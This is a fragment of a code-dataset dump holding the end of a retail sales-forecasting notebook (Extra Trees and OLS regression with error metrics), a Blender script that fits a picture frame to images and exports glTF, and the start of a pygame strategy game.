label='Train',linewidth=3)\nplt.plot(y_test_df2.index, y_test_df2, label='Test',linewidth=3)\nplt.plot(etr_errors_df2.index, etr_errors_df2['Predicted'], label='Forecast - Extra Tree Regressor',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Extra Tree Regressor')\nplt.show()\n\n\n# In[258]:\n\n\nfig = plt.figure(figsize=(14,7))\nplt.plot(etr_errors_df2.index, etr_errors_df2.Error, label='Error',linewidth=3)\nplt.plot(etr_errors_df2.index, etr_errors_df2.Actual, label='Actual Sales',linewidth=3)\nplt.plot(etr_errors_df2.index, etr_errors_df2.Predicted, label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Extra Tree Regressor Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# # Fast Moving Consumer Goods\n\n# In[259]:\n\n\n# fit model\netr_model = ExtraTreesRegressor(n_estimators=100)\netr_model.fit(x_train_fmcg, y_train_fmcg)\n\netr_preds2 = etr_model.predict(x_test_fmcg)\nprint('Prediction is done..')\n\n\n# In[260]:\n\n\netr_errors_fmcg = pd.DataFrame(index=y_test_fmcg.index)\netr_errors_fmcg['Modelname'] = 'Extra Trees Regressor'\netr_errors_fmcg['Actual'] = y_test_fmcg\netr_errors_fmcg['Predicted'] = etr_preds2\netr_errors_fmcg['Error'] = etr_preds2 - y_test_fmcg\netr_errors_fmcg.head()\n\n\n# In[261]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_etr_fmcg = mean_absolute_error(y_test_fmcg, etr_preds2)\n\n# Calculate the mean squared error (MSE)\nmse_etr_fmcg = mean_squared_error(y_test_fmcg, etr_preds2)\n# Calculate the root mean squared error (RMSE)\nrmse_etr_fmcg = np.sqrt(mse_etr_fmcg)\n\n\n# In[262]:\n\n\ny_train_fmcg2 = y_train_fmcg.resample('M').mean()\n\netr_errors_fmcg2 = etr_errors_fmcg.resample('M').mean()\n\n# Convert the index to datetime\ny_test_fmcg2=y_test_fmcg.copy()\ny_test_fmcg2.index = pd.to_datetime(y_test_fmcg2.index)\n\n# Resample the Series based on month\ny_test_fmcg2 = y_test_fmcg2.resample('M').mean()\n\n\n# In[263]:\n\n\n# Evaluate predictions for Extra Tree Regressor\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_fmcg2.index, y_train_fmcg2, label='Train',linewidth=3)\nplt.plot(y_test_fmcg2.index, y_test_fmcg2, label='Test',linewidth=3)\nplt.plot(etr_errors_fmcg2.index, etr_errors_fmcg2['Predicted'], label='Forecast - Extra Tree Regressor',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Extra Tree Regressor')\nplt.show()\n\n\n# In[264]:\n\n\nfig = plt.figure(figsize=(14,7))\nplt.plot(etr_errors_fmcg2.index, etr_errors_fmcg2.Error, label='Error',linewidth=3)\nplt.plot(etr_errors_fmcg2.index, etr_errors_fmcg2.Actual, label='Actual Sales',linewidth=3)\nplt.plot(etr_errors_fmcg2.index, etr_errors_fmcg2.Predicted, label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Extra Tree Regressor Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# # Others\n\n# In[265]:\n\n\n# fit model\netr_model = ExtraTreesRegressor(n_estimators=100)\netr_model.fit(x_train_others, y_train_others)\n\netr_preds3 = etr_model.predict(x_test_others)\nprint('Prediction is done..')\n\n\n# In[266]:\n\n\netr_errors_others = pd.DataFrame(index=y_test_others.index)\netr_errors_others['Modelname'] = 'Extra Trees Regressor'\netr_errors_others['Actual'] = y_test_others\netr_errors_others['Predicted'] = etr_preds3\netr_errors_others['Error'] = etr_preds3 - y_test_others\netr_errors_others.head()\n\n\n# In[267]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_etr_others = mean_absolute_error(y_test_others, etr_preds3)\n\n# Calculate the mean squared error (MSE)\nmse_etr_others = mean_squared_error(y_test_others, etr_preds3)\n# Calculate the root mean squared error (RMSE)\nrmse_etr_others = np.sqrt(mse_etr_others)\n\n\n# In[268]:\n\n\ny_train_others2 = y_train_others.resample('M').mean()\n\netr_errors_others2 = etr_errors_others.resample('M').mean()\n\n# Convert the index to datetime\ny_test_others2=y_test_others.copy()\ny_test_others2.index = pd.to_datetime(y_test_others2.index)\n\n# Resample the Series based on month\ny_test_others2 = y_test_others2.resample('M').mean()\n\n\n# In[269]:\n\n\n# Evaluate predictions for Extra Tree Regressor\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_others2.index, y_train_others2, label='Train',linewidth=3)\nplt.plot(y_test_others2.index, y_test_others2, label='Test',linewidth=3)\nplt.plot(etr_errors_others2.index, etr_errors_others2['Predicted'], label='Forecast - Extra Tree Regressor',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Extra Tree Regressor')\nplt.show()\n\n\n# In[270]:\n\n\nfig = plt.figure(figsize=(14,7))\nplt.plot(etr_errors_others2.index, etr_errors_others2.Error, label='Error',linewidth=3)\nplt.plot(etr_errors_others2.index, etr_errors_others2.Actual, label='Actual Sales',linewidth=3)\nplt.plot(etr_errors_others2.index, etr_errors_others2.Predicted, label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Extra Tree Regressor Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# # --------------------------------------------------------------------------\n\n# # Multiple Linear regression\n\n# In[271]:\n\n\nimport statsmodels.api as sm\n\n\n# # Drinks and Food\n\n# In[272]:\n\n\n# Fit the OLS model\nml_model = sm.OLS(y_train_df, x_train_df).fit()\n\n# Make predictions on the test data\nml_preds1 = ml_model.predict(x_test_df)\n\n\n# In[273]:\n\n\nml_errors_df = pd.DataFrame(index=y_test_df.index)\nml_errors_df['Modelname'] = 'Multi Linear Regression'\nml_errors_df['Actual'] = y_test_df\nml_errors_df['Predicted'] = ml_preds1\nml_errors_df['Error'] = ml_preds1 - y_test_df\nml_errors_df.head()\n\n\n# In[274]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_ml_df = mean_absolute_error(y_test_df, ml_preds1)\n\n# Calculate the mean squared error (MSE)\nmse_ml_df = mean_squared_error(y_test_df, ml_preds1)\n# Calculate the root mean squared error (RMSE)\nrmse_ml_df = np.sqrt(mse_ml_df)\n\n\n# In[275]:\n\n\ny_train_df3 = y_train_df.resample('M').mean()\n\nml_errors_df3 = ml_errors_df.resample('M').mean()\n\n# Convert the index to datetime\ny_test_df3=y_test_df.copy()\ny_test_df3.index = pd.to_datetime(y_test_df3.index)\n\n# Resample the Series based on month\ny_test_df3 = y_test_df3.resample('M').mean()\n\n\n# In[276]:\n\n\n# Evaluate predictions for Multiple Linear Regressor\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_df3.index, y_train_df3, label='Train',linewidth=3)\nplt.plot(y_test_df3.index, y_test_df3, label='Test',linewidth=3)\nplt.plot(ml_errors_df3.index, ml_errors_df3['Predicted'], label='Forecast - Multiple Linear Regressor',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Multiple Linear Regression')\nplt.show()\n\n\n# In[277]:\n\n\n# Evaluate predictions for Linear Regression\nfig = plt.figure(figsize=(14,7))\nplt.plot(ml_errors_df3.index, ml_errors_df3.Error, label='Error',linewidth=3)\nplt.plot(ml_errors_df3.index, ml_errors_df3.Actual, label='Actual Sales',linewidth=3)\nplt.plot(ml_errors_df3.index, ml_errors_df3.Predicted, label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Multiple Linear Regressor Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# # Fast Moving Consumer Goods\n\n# In[278]:\n\n\n# Fit the OLS model\nml_model = sm.OLS(y_train_fmcg, x_train_fmcg).fit()\n\n# Make predictions on the test data\nml_preds2 = ml_model.predict(x_test_fmcg)\n\n\n# In[279]:\n\n\nml_errors_fmcg = pd.DataFrame(index=y_test_fmcg.index)\nml_errors_fmcg['Modelname'] = 'Multi Linear Regression'\nml_errors_fmcg['Actual'] = y_test_fmcg\nml_errors_fmcg['Predicted'] = ml_preds2\nml_errors_fmcg['Error'] = ml_preds2 - y_test_fmcg\nml_errors_fmcg.head()\n\n\n# In[280]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_ml_fmcg = mean_absolute_error(y_test_fmcg, ml_preds2)\n\n# Calculate the mean squared error (MSE)\nmse_ml_fmcg = mean_squared_error(y_test_fmcg, ml_preds2)\n# Calculate the root mean squared error (RMSE)\nrmse_ml_fmcg = np.sqrt(mse_ml_fmcg)\n\n\n# In[281]:\n\n\ny_train_fmcg3 = y_train_fmcg.resample('M').mean()\n\nml_errors_fmcg3 = ml_errors_fmcg.resample('M').mean()\n\n# Convert the index to datetime\ny_test_fmcg3=y_test_others.copy()\ny_test_fmcg3.index = pd.to_datetime(y_test_fmcg3.index)\n\n# Resample the Series based on month\ny_test_fmcg3 = y_test_fmcg3.resample('M').mean()\n\n\n# In[282]:\n\n\n# Evaluate predictions for Extra Tree Regressor\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_fmcg3.index, y_train_fmcg3, label='Train',linewidth=3)\nplt.plot(y_test_fmcg3.index, y_test_fmcg3, label='Test',linewidth=3)\nplt.plot(ml_errors_fmcg3.index, ml_errors_fmcg3['Predicted'], label='Forecast - Multiple Linear Regressor',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Multiple Linear Regressor')\nplt.show()\n\n\n# In[283]:\n\n\n# Evaluate predictions for Linear Regression\nfig = plt.figure(figsize=(14,7))\nplt.plot(ml_errors_fmcg3.index, ml_errors_fmcg3.Error, label='Error',linewidth=3)\nplt.plot(ml_errors_fmcg3.index, ml_errors_fmcg3.Actual, label='Actual Sales',linewidth=3)\nplt.plot(ml_errors_fmcg3.index, ml_errors_fmcg3.Predicted, label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Multiple Linear Regressor Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# # Others\n\n# In[284]:\n\n\n# Fit the OLS model\nml_model = sm.OLS(y_train_others, x_train_others).fit()\n\n# Make predictions on the test data\nml_preds3 = ml_model.predict(x_test_others)\n\n\n# In[285]:\n\n\nml_errors_others = pd.DataFrame(index=y_test_others.index)\nml_errors_others['Modelname'] = 'Multi Linear Regression'\nml_errors_others['Actual'] = y_test_others\nml_errors_others['Predicted'] = ml_preds3\nml_errors_others['Error'] = ml_preds3 - y_test_others\nml_errors_others.head()\n\n\n# In[286]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_ml_others = mean_absolute_error(y_test_others, ml_preds3)\n\n# Calculate the mean squared error (MSE)\nmse_ml_others = mean_squared_error(y_test_others, ml_preds3)\n# Calculate the root mean squared error (RMSE)\nrmse_ml_others = np.sqrt(mse_ml_others)\n\n\n# In[287]:\n\n\ny_train_others3 = y_train_others.resample('M').mean()\n\nml_errors_others3 = ml_errors_others.resample('M').mean()\n\n# Convert the index to datetime\ny_test_others3=y_test_others.copy()\ny_test_others3.index = pd.to_datetime(y_test_others3.index)\n\n# Resample the Series based on month\ny_test_others3 = y_test_others3.resample('M').mean()\n\n\n# In[288]:\n\n\n# Evaluate predictions for Extra Tree Regressor\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_others3.index, y_train_others3, label='Train',linewidth=3)\nplt.plot(y_test_others3.index, y_test_others3, label='Test',linewidth=3)\nplt.plot(ml_errors_others3.index, ml_errors_others3['Predicted'], label='Forecast - Multiple Linear Regressor',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Multiple Linear Regressor')\nplt.show()\n\n\n# In[289]:\n\n\n# Evaluate predictions for Linear Regression\nfig = plt.figure(figsize=(14,7))\nplt.plot(ml_errors_others3.index, ml_errors_others3.Error, label='Error',linewidth=3)\nplt.plot(ml_errors_others3.index, ml_errors_others3.Actual, label='Actual Sales',linewidth=3)\nplt.plot(ml_errors_others3.index, ml_errors_others3.Predicted, label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Multiple Linear Regressor Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# # -----------------------------------------------------------------------------------------\n\n# ## Evaluation Metrics (MAE/RMSE/MAE)\n\n# ### Product Wise\n\n# In[312]:\n\n\nevaluation_data = SA_data.merge(prophet_data, on='Product Identifier', how='inner').merge(des_data, on='Product Identifier', how='inner')\n\nevaluation_data\n\n\n# ### Category Wise\n\n# #### Drinks and Food\n\n# In[291]:\n\n\nSA_errors_df = SA_errors_df.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nSA_errors_df['MAE'] = mae_sa_df\nSA_errors_df['MSE'] = mse_sa_df\nSA_errors_df['RMSE'] = rmse_sa_df\n\n\n# In[292]:\n\n\nresult_lr_df = lr_errors_df.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_lr_df['MAE'] = mae_lr_df\nresult_lr_df['MSE'] = mse_lr_df\nresult_lr_df['RMSE'] = rmse_lr_df\n\n\n# In[294]:\n\n\nresult_etr_df = etr_errors_df.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_etr_df['MAE'] = mae_etr_df\nresult_etr_df['MSE'] = mse_etr_df\nresult_etr_df['RMSE'] = rmse_etr_df\n\n\n# In[295]:\n\n\nresult_ml_df = ml_errors_df.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_ml_df['MAE'] = mae_ml_df\nresult_ml_df['MSE'] = mse_ml_df\nresult_ml_df['RMSE'] = rmse_ml_df\n\n\n# In[296]:\n\n\nresult_pr_df = pr_errors_df.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_pr_df['MAE'] = mae_pr_df\nresult_pr_df['MSE'] = mse_pr_df\nresult_pr_df['RMSE'] = rmse_pr_df\n\n\n# In[297]:\n\n\nlist_objs = [SA_errors_df,result_pr_df,result_lr_df,result_etr_df,result_ml_df]\nmetrics_table1 = pd.concat(list_objs)\nmetrics_table1\n\n\n# #### Fast Moving Consumer Goods\n\n# In[313]:\n\n\nSA_errors_fmcg = SA_errors_fmcg.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nSA_errors_fmcg['MAE'] = mae_sa_fmcg\nSA_errors_fmcg['MSE'] = mse_sa_fmcg\nSA_errors_fmcg['RMSE'] = rmse_sa_fmcg\n\n\n# In[300]:\n\n\nresult_lr_fmcg = lr_errors_fmcg.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_lr_fmcg['MAE'] = mae_lr_fmcg\nresult_lr_fmcg['MSE'] = mse_lr_fmcg\nresult_lr_fmcg['RMSE'] = rmse_lr_fmcg\n\n\n# In[301]:\n\n\nresult_etr_fmcg = etr_errors_fmcg.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_etr_fmcg['MAE'] = mae_etr_fmcg\nresult_etr_fmcg['MSE'] = mse_etr_fmcg\nresult_etr_fmcg['RMSE'] = rmse_etr_fmcg\n\n\n# In[302]:\n\n\nresult_ml_fmcg = ml_errors_fmcg.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_ml_fmcg['MAE'] = mae_ml_fmcg\nresult_ml_fmcg['MSE'] = mse_ml_fmcg\nresult_ml_fmcg['RMSE'] = rmse_ml_fmcg\n\n\n# In[303]:\n\n\nresult_pr_fmcg = pr_errors_fmcg.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_pr_fmcg['MAE'] = mae_pr_fmcg\nresult_pr_fmcg['MSE'] = mse_pr_fmcg\nresult_pr_fmcg['RMSE'] = rmse_pr_fmcg\n\n\n# In[304]:\n\n\nlist_objs = [SA_errors_fmcg,result_pr_fmcg,result_lr_fmcg,result_etr_fmcg,result_ml_fmcg]\nmetrics_table2 = pd.concat(list_objs)\nmetrics_table2\n\n\n# #### Others\n\n# In[305]:\n\n\nSA_errors_others = SA_errors_others.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nSA_errors_others['MAE'] = mae_sa_others\nSA_errors_others['MSE'] = mse_sa_others\nSA_errors_others['RMSE'] = rmse_sa_others\n\n\n# In[306]:\n\n\nresult_lr_others = lr_errors_others.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_lr_others['MAE'] = mae_lr_others\nresult_lr_others['MSE'] = mse_lr_others\nresult_lr_others['RMSE'] = rmse_lr_others\n\n\n# In[307]:\n\n\nresult_etr_others = etr_errors_others.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_etr_others['MAE'] = mae_etr_others\nresult_etr_others['MSE'] = mse_etr_others\nresult_etr_others['RMSE'] = rmse_etr_others\n\n\n# In[308]:\n\n\nresult_ml_others = ml_errors_others.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_ml_others['MAE'] = mae_ml_others\nresult_ml_others['MSE'] = mse_ml_others\nresult_ml_others['RMSE'] = rmse_ml_others\n\n\n# In[309]:\n\n\nresult_pr_others = pr_errors_others.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_pr_others['MAE'] = mae_pr_others\nresult_pr_others['MSE'] = mse_pr_others\nresult_pr_others['RMSE'] = rmse_pr_others\n\n\n# In[311]:\n\n\nlist_objs = [SA_errors_others,result_pr_others,result_lr_others,result_etr_others,result_ml_others]\nmetrics_table2 = pd.concat(list_objs)\nmetrics_table2\n\n\n# # ------------------------------------------------------------------------------------\n","repo_name":"JosephParavathel/Sales-Forecasting-for-Retail-Chain","sub_path":"project retail chain22.py","file_name":"project retail chain22.py","file_ext":"py","file_size_in_byte":93573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73438187447","text":"import bpy\nimport os\nimport sys\n\n# we get blend file path\nfilepath = bpy.data.filepath\n\n# we get the directory relative to the blend file path\ndir = os.path.dirname(filepath)\n\n# we append our path to blender modules path\n# we use if not statement to do this one time only\nif not dir in sys.path:\n sys.path.append(dir)\n\nfrom src.constants import FRAME_OBJECT_NAME, PICTURE_OBJECT_NAME, PICTURE_MATERIAL_NAME, PICTURE_MATERIAL_TEXTURE_NAME, TOP_FRAME_EDGE_VERTEX_GROUP, TOP_PICTURE_EDGE_VERTEX_GROUP\nfrom src.utils.get_image_dimensions import get_image_dimensions\nfrom src.exporters.exporter import exporter\n\n# Get the directory of the current script\nscript_dir = os.path.dirname(os.path.realpath(__file__))\n\n\ndef init():\n # Set object mode\n bpy.ops.object.mode_set(mode='OBJECT')\n\n # Locate your object by name and collection\n obj = bpy.data.collections['Scene'].objects[FRAME_OBJECT_NAME]\n\n # Make sure the object is the active object for further operations\n bpy.context.view_layer.objects.active = obj\n obj.select_set(True)\n\n\ndef adjust_frame(amount_to_move):\n obj = bpy.data.collections['Scene'].objects[FRAME_OBJECT_NAME]\n\n # Access the specific vertex group\n if TOP_FRAME_EDGE_VERTEX_GROUP in obj.vertex_groups:\n vgroup = obj.vertex_groups[TOP_FRAME_EDGE_VERTEX_GROUP]\n else:\n raise Exception(\"Vertex group \" +\n TOP_FRAME_EDGE_VERTEX_GROUP + \" not found!\")\n\n # Iterate over vertices and manipulate those belonging to the vertex group\n for v in obj.data.vertices:\n for g in v.groups:\n if g.group == vgroup.index:\n # Move vertex along the Z-axis\n v.co.y += amount_to_move\n\n\ndef adjust_picture(amount_to_move):\n obj = bpy.data.collections['Scene'].objects[PICTURE_OBJECT_NAME]\n\n # Access the specific vertex group\n if TOP_PICTURE_EDGE_VERTEX_GROUP in obj.vertex_groups:\n vgroup = obj.vertex_groups[TOP_PICTURE_EDGE_VERTEX_GROUP]\n else:\n raise Exception(\"Vertex group \" +\n TOP_PICTURE_EDGE_VERTEX_GROUP + \" not found!\")\n\n # Iterate over vertices and manipulate those belonging to the vertex group\n for v in obj.data.vertices:\n for g in v.groups:\n if g.group == vgroup.index:\n # Move vertex along the Z-axis\n v.co.y += amount_to_move\n\n\ndef adjust(amount_to_move):\n adjust_frame(amount_to_move)\n adjust_picture(amount_to_move)\n\n\ndef load_image(image_path):\n # Load image into picture object texture\n obj = bpy.data.objects.get(PICTURE_OBJECT_NAME)\n if obj is None:\n raise Exception(\"Object not found!\")\n else:\n mat = bpy.data.materials.get(PICTURE_MATERIAL_NAME)\n if mat is None:\n raise Exception(\"Material not found!\")\n else:\n # Access the shader node tree\n nodes = mat.node_tree.nodes\n tex_image_node = nodes.get(PICTURE_MATERIAL_TEXTURE_NAME)\n\n if tex_image_node is None:\n raise Exception(\n \"'\" + PICTURE_MATERIAL_TEXTURE_NAME + \"' node not found!\")\n else:\n # Update the image\n new_image = bpy.data.images.load(filepath=image_path)\n tex_image_node.image = new_image\n\n width, height = get_image_dimensions(image_path)\n aspect_ratio = width / height\n default_plane_width = 2\n amount_to_move = (default_plane_width *\n (1 / aspect_ratio)) - default_plane_width\n\n # Adjust frame & picture\n adjust(amount_to_move)\n\n return amount_to_move\n\n\ndef process_images(input_folder, output_folder):\n # Create output directory if it doesn't exist\n os.makedirs(output_folder, exist_ok=True)\n\n filetypes = ['.jpg', '.jpeg', '.png']\n\n format = \"gltf\"\n\n for filename in os.listdir(input_folder):\n if filename.endswith(tuple(filetypes)):\n print(f\"Processing {filename}...\")\n\n input_path = os.path.join(input_folder, filename)\n output_filename = os.path.splitext(filename)[0] + \".\" + format\n output_path = os.path.join(output_folder, output_filename)\n\n amount_to_move = load_image(input_path)\n exporter(format=format, output_path=output_path)\n\n # Reset frame & picture\n adjust(-amount_to_move)\n\n\nif __name__ == \"__main__\":\n init()\n\n script_dir = os.path.dirname(os.path.abspath(__file__))\n input_folder = os.path.join(script_dir, 'input')\n output_folder = os.path.join(script_dir, 'output')\n\n process_images(input_folder, output_folder)\n","repo_name":"bartaxyz/artwork-framer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33880743072","text":"#Imports\r\nfrom noise import pnoise2\r\nimport numpy as np\r\nimport pygame\r\npygame.init()\r\nimport random\r\n\r\n#Constantes\r\nHEIGHT = 800\r\nWIDTH = 600\r\nAMARELO = (255, 255, 0)\r\nAMARELO_CLARO = (200, 200, 100)\r\nPRETO = (84, 84, 84)\r\nAZUL = (0, 43, 255)\r\nVERDE = (214, 255, 199)\r\n\r\nRAZAO = (30, 40) #30 rows, 40 columns\r\n#Razão a partir da qual são construidos todos os elementos do jogo (cada pixel é um retangulo de 30 por 40, ou qualquer que sejam os dois números ali em cima)\r\n\r\nnum_colunas = WIDTH // RAZAO[0]\r\nnum_linhas = HEIGHT // RAZAO[1]\r\n\r\nFONTE = pygame.font.SysFont('Comic Sans MS', 25)\r\n\r\n#Eventos do usuario\r\ncomputa_trabalhos = pygame.USEREVENT + 0\r\npygame.time.set_timer(computa_trabalhos, 1000)\r\n\r\nclass Control:\r\n def __init__(self):\r\n self.lista_tropas_br = [] # uma lista com todas as tropas brasileiras\r\n self.lista_tropas_sp = [] # uma lista com todas as tropas paulistas\r\n self.tropas_selecionadas_br = [] # uma lista com todas as tropas brasileiras selecionadas\r\n self.tropas_selecionadas_sp = [] # uma lista com todas as tropas paulistas selecionadas\r\n self.lista_florestas = [] # uma lista com as florestas\r\n self.lista_construcoes_br = []\r\n self.lista_construcoes_sp = []\r\n self.lista_minas_br = []\r\n self.lista_minas_sp = []\r\n self.num_gold_br = 0\r\n self.num_gold_sp = 0\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, Control):\r\n return NotImplemented\r\n return self.lista_tropas_br == other.lista_tropas_br and self.lista_tropas_sp == other.lista_tropas_sp and self.tropas_selecionadas_br == other.tropas_selecionadas_br and self.tropas_selecionadas_sp == other.tropas_selecionadas_sp and self.lista_florestas == other.lista_florestas and self.lista_construcoes_br == other.lista_construcoes_br and self.lista_construcoes_sp == other.lista_construcoes_sp and self.lista_minas_br == other.lista_minas_br and self.lista_minas_sp == other.lista_minas_sp\r\n\r\n def screen_coordinates_to_grid(self, pos):\r\n tupla = (pos[0] // num_linhas, pos[1] // num_colunas)\r\n return tupla\r\n\r\n def grid_to_screen_coordinates(self, grid):\r\n tupla = (grid[0] * num_linhas, grid[1] * num_colunas)\r\n return tupla\r\n\r\n def cria_tropa_br(self, pos): # cria uma tropa dada uma posição\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n tropa = Tropa(pos, 30)\r\n self.lista_tropas_br.append(tropa)\r\n\r\n def cria_tropa_sp(self, pos):\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n tropa = Tropa(pos, 20)\r\n self.lista_tropas_sp.append(tropa)\r\n\r\n def cria_worker_br(self, pos): # cria uma tropa dada uma posição\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n worker = Worker(pos, 7)\r\n self.lista_tropas_br.append(worker)\r\n\r\n def cria_worker_sp(self, pos): # cria uma tropa dada uma posição\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n worker = Worker(pos, 7)\r\n self.lista_tropas_sp.append(worker)\r\n\r\n def pinta_tropas(self, tela): # itera através da lista de tropas e pinta | Atualizado\r\n for tropa in self.lista_tropas_br:\r\n if tropa.hidden == False:\r\n tropa.pinta_tropa_br(tela)\r\n for tropa in self.lista_tropas_sp:\r\n if tropa.hidden == False:\r\n tropa.pinta_tropa_sp(tela)\r\n\r\n def pinta_florestas(self, tela): # itera através da lista de florestas e pinta | Nao precisa atualizacao\r\n for floresta in self.lista_florestas:\r\n floresta.pinta_floresta(tela)\r\n\r\n def pinta_contrucoes(self, tela): #Atualizado\r\n for construcao in self.lista_construcoes_br:\r\n construcao.pinta_construcao_br(tela)\r\n for construcao in self.lista_construcoes_sp:\r\n construcao.pinta_construcao_sp(tela)\r\n\r\n def pinta_minas(self, tela): #Atualizado\r\n for mina in self.lista_minas_br:\r\n mina.pinta_mina_br(tela)\r\n for mina in self.lista_minas_sp:\r\n mina.pinta_mina_sp(tela)\r\n\r\n def pinta_tela(self, tela):\r\n tela.fill(PRETO)\r\n self.pinta_tropas(tela) #Atualizado\r\n self.pinta_florestas(tela) #Nao precisa atualizacao\r\n self.pinta_contrucoes(tela) #Atualizado\r\n self.pinta_minas(tela) #Atualizado\r\n\r\n texto_gold_br = FONTE.render(\"Dinheiro: {}\".format(self.num_gold_br), True, (128,128,128))\r\n texto_gold_sp = FONTE.render(\"Dinheiro: {}\".format(self.num_gold_sp), True, (128,128,128))\r\n tela.blit(texto_gold_br, (0, 0))\r\n tela.blit(texto_gold_sp, (650, 0))\r\n\r\n texto_vida_base_br = FONTE.render(\"Vida: {}\".format(self.lista_construcoes_br[0].vida), True, (128,128,128))\r\n texto_vida_base_sp = FONTE.render(\"Vida: {}\".format(self.lista_construcoes_sp[0].vida), True, (128,128,128))\r\n tela.blit(texto_vida_base_br, (0, 50))\r\n tela.blit(texto_vida_base_sp, (650, 50))\r\n\r\n pygame.display.update()\r\n\r\n def processar_eventos(self, eventos, playerId):\r\n\r\n if self.lista_construcoes_br[0].vida <= 0:\r\n return 0\r\n if self.lista_construcoes_sp[0].vida <= 0:\r\n return 1\r\n\r\n for evento in eventos:\r\n\r\n if evento.type == computa_trabalhos:\r\n for mina in self.lista_minas_br:\r\n self.num_gold_br += mina.computa_trabalho()\r\n\r\n for mina in self.lista_minas_sp:\r\n self.num_gold_sp += mina.computa_trabalho()\r\n\r\n if evento.type == pygame.MOUSEBUTTONDOWN and playerId == 0: #Clique playerId=0 (BR)\r\n pos = 